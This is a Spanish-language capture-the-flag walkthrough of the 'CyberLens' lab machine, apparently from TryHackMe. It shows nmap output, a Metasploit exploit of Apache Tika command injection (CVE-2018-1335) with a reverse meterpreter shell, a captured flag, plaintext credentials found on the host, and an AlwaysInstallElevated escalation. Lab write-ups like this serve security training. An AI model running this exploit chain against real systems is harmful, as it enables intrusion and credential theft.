CiberLente(msfconsole )

PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
3389/tcp  open     ms-wbt-server  Microsoft Terminal Services
|_ssl-date: 2025-01-13T23:58:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2025-01-12T23:55:48
|_Not valid after:  2025-07-14T23:55:48
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-13T23:58:18+00:00
3885/tcp  filtered topflow-ssl
5985/tcp  open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open     pando-pub?
10051/tcp filtered zabbix-trapper
13293/tcp filtered unknown
16781/tcp filtered unknown
23181/tcp filtered unknown
30693/tcp filtered unknown
37566/tcp filtered unknown
41450/tcp filtered unknown
46886/tcp filtered unknown
47001/tcp open     http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47451/tcp filtered unknown
49664/tcp open     msrpc          Microsoft Windows RPC
49665/tcp open     msrpc          Microsoft Windows RPC
49666/tcp open     msrpc          Microsoft Windows RPC
49667/tcp open     msrpc          Microsoft Windows RPC
49668/tcp open     msrpc          Microsoft Windows RPC
49670/tcp open     msrpc          Microsoft Windows RPC
49671/tcp open     msrpc          Microsoft Windows RPC
49677/tcp open     msrpc          Microsoft Windows RPC
52425/tcp filtered unknown
55206/tcp filtered unknown
55326/tcp filtered unknown
61777/tcp open     http           Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/plain).
|_http-cors: HEAD GET
61912/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-13T23:58:21
|_  start_date: N/A

Entramos al http que esta en el puerto 61777

Busacmos un exploit.

                                                                                                        
┌──(docker㉿docker)-[~/try]
└─$ searchsploit tika   
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)       | windows/remote/47208.rb
Apache Tika-server < 1.18 - Command Injection                         | windows/remote/46540.py
Joomla! Component com_cartikads 1.0 - Arbitrary File Upload           | php/webapps/10984.txt
Mitra Informatika Solusindo cart - SQL Injection                      | php/webapps/5214.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                        
┌──(docker㉿docker)-[~/try]
└─$ searchsploit -m windows/remote/47208.rb
  Exploit: Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
      URL: https://www.exploit-db.com/exploits/47208
     Path: /usr/share/exploitdb/exploits/windows/remote/47208.rb
    Codes: CVE-2018-1335
 Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/docker/try/47208.rb


                                                                                                        
┌──(docker㉿docker)-[~/try]
└─$ ls
47208.rb  LasMarco.ovpn  gobuster.out  nmap-trickster.txt

┌──(docker㉿docker)-[~/try]
└─$ msfconsole 
Metasploit tip: Use the resource command to run commands from a file
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                 
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                               
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                              
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                             
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo                                                             
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx                                                             
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl                                                             
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.                                                             
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc                                                              
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo                                                               
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl                                                                
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;                                                                 
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.                                                                  
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,                                                                    
           :kk;.OOOOOOOOOOOOO.;Ok:                                                                      
             ;kOOOOOOOOOOOOOOOk:                                                                        
               ,xOOOOOOOOOOOx,                                                                          
                 .lOOOOOOOl.                                                                            
                    ,dOd,                                                                               
                      .                                                                                 

       =[ metasploit v6.4.38-dev                          ]
+ -- --=[ 2466 exploits - 1273 auxiliary - 393 post       ]
+ -- --=[ 1475 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search tika

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript         2018-04-25       excellent  Yes    Apache Tika Header Command Injection                                                                              
   1  post/linux/gather/puppet                             .                normal     No     Puppet Config Gather
   2  auxiliary/scanner/http/wp_gimedia_library_file_read  .                normal     No     WordPress GI-Media Library Plugin Directory Traversal Vulnerability


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read                                                                                   

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options

Configuramos las opciones LHOST, RHOSTy RPORT.


msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.9.3.32
LHOST => 10.9.3.32
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run


meterpreter > shell
Process 4696 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>


C:\Windows\system32>cd C:\Users\cyberlens\Desktop
cd C:\Users\cyberlens\Desktop

type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
C:\Users\CyberLens\Desktop>

Escalada

Usando tree /f, enumeramos el sistema de archivos del usuario y encontramos sus credenciales en C:\Users\CyblerLens.

El comando tree /f enumera archivos en ese directorio

C:\Users\CyberLens\Desktop> tree /f

tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
    EC2 Feedback.website
    EC2 Microsoft Windows Guide.website
    user.txt
    
No subfolders exist 


C:\Users\CyberLens\Desktop>cd..    
cd..

C:\Users\CyberLens>tree /f
tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
����3D Objects
����Contacts
����Desktop
�       EC2 Feedback.website
�       EC2 Microsoft Windows Guide.website
�       user.txt
�       
����Documents
�   ����Management
�           CyberLens-Management.txt
�           
����Downloads
����Favorites
�   �   Bing.url
�   �   
�   ����Links
����Links
�       Desktop.lnk
�       Downloads.lnk
�       
����Music
����Pictures
����Saved Games
����Searches
����Videos

Se encontro el siguiente archivo: CyberLens-Management.txt

C:\Users\CyberLens>type Documents\Management\Cyberlens-Management.txt
type Documents\Management\Cyberlens-Management.txt
Remember, manual enumeration is often key in an engagement ;)

CyberLens
HackSmarter123
C:\Users\CyberLens>

Ahora ecalada:

msf6 exploit(windows/local/always_install_elevated) > show options

Module options (exploit/windows/local/always_install_elevated):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.42     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows

PreviousAlpinista (Wordpress)Nexttomghost (ajp13)

Last updated 1 year ago